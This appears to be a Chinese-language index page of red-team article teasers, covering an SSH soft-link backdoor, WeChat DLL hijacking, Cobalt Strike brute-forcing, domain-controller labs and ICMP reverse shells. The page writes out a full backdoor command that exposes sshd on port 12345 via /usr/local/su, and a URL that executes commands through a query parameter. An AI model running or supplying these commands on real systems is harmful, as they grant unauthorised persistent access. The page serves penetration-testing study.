红队技术

0x00 前言 学习了Sevck发表Linux软连接后门的《一条命令引发的思考》，还是存在几个疑惑点，仔细探究之后就有了这篇文章 0x01简单回顾 一、Linux经典软连接后门命令…

通过软连接建立一个ssh后门： ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 说明：建立软连接到/u…

利用管理员对服务器的权限分配不当完成的权限提升（开发者的意识不够强） 一般情况下面 普通用户对程序是没有控制权的 然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知…

node app.js http://192.168.0.187:8000/?command=netstat%20-an

概述 白程序：WeChat.exe 恶意dll:wechatwin.dll 制作流程 获取导出函数列表 shellcode写入内存加载 DllMain执行jmp_shellcode

为了防止主机被入侵，现在大部分的内网环境都装有流量审计工具，专门用来分析审查流量特征，分析网络流量，如后门特征、行为特征，像metasploit在内网做横行渗透时，这些流量很容易就…

以下是学员小苏自学三个月的一些心得，希望能帮助某些想入门的人 这篇主要对于零基础刚开始进行项目的朋友一个讲解帮助，第二部分免杀主要为思路讲解。上一篇文章 零基础学习渗透过程  首先…

CobaltStrike TeamServer口令暴力破解 Cobalt Strike是一款超级好用的渗透测试工具，拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，soc…

项目九 是一个多域控 而且不出网的环境，是根据实际的环境改造而来。多 个域控应用在大型内网中，其中域控分有主域控，支部域控。例如一个公司在北 京有个总部办事处，广州有办事处，在上海…

主机是可以使用ping 所以支持icmp协议出网 Icmpsh 这个攻击可以用icmp反弹shell 项目地址 https://github.com/inquisb/icmpsh …